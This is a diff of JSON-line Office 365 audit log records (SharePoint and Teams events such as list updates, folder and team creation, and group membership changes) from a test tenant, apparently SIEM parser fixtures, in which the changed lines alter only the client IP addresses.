+{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
 {"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"}
 {"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"}
-{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"}
+{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"}
 {"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
-{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"<SiteCreationSource>O365AdminCenter<\/SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True<\/TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False<\/TenantSettings.UseCustomSiteCreationForm>"}
+{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.193","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"<SiteCreationSource>O365AdminCenter<\/SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True<\/TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False<\/TenantSettings.UseCustomSiteCreationForm>"}
 {"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"}
 {"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"<Group>Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"}
-{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateType